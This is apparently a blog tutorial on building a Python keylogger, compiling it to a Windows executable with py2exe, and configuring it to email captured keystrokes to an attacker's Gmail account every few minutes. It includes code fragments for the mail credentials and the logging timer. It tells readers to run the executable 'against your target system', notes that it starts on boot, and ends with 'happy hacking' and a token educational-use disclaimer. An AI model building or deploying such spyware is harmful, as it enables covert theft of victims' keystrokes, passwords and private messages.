[MALWARE] Keylogger Using python [Scratch to Executable]
Hello folks ,welcome back to our blog with a new spicy topic on keylogger. we can create keylogger from the scratch (python script to .exe) to windows executable.If you are a programmer it will be easy for you to understand the concept behind it .
GitHub link - https://github.com/a-koding/PKLogger.git
Download the scripts from github link provided above
Pre - Requsites :
Make sure you have a Virtualbox with windows 7 32bit installed in it.
- python 2.7 32-bit Link to download
- py2exe-0.6.9.win32-py2.7 Link to download
- pyHook-1.5.1.win32-py2.7 Link to download
- pywin32-217.win32-py2.7 Link to download
- winshell-0.3.win32 Link to download
Lets start building :
Step 1:
Open the downloaded folder from GitHub and open the Keylogger.pyw file.
Step 2:
Create a dedicated gmail account for keylogger. and add you gmail id and password to the Keylogger.pyw file and save it.
def my_function(): |
gmail_user = '#your mailid' |
gmail_password = '#your password' |
sent_from = gmail_user |
Step 3:
We can change the time duration to send mail of keylogger text file
Here 180 seconds is given (ie 180/60) == 3 mins
300 == 5 mins like wise.
def printit(): |
fp=open("C:UsersPublicLibrarieskeylogs.txt","a") |
threading.Timer(180.0, printit).start() |
Step 4:
Right click Setup.py Edit with idle
- Run-->Run Module
Step 5:
After Successful compilation you can find folders created , open dist folder you can find the Malware software that you created.
Step 6:
Use this executable against your target system , you will receive the keylogging text file to you dedicated gmail account.This keylogger will automatically gets triggered after the system boots up.
happy hacking!!!!!!!!!
Important note : [Don’t rename the file after you compile if you want the exe in name you want change it in keylogger.pyw script]
[This is for your educational purpose only i am not responsible if you use this for malicious purpose]
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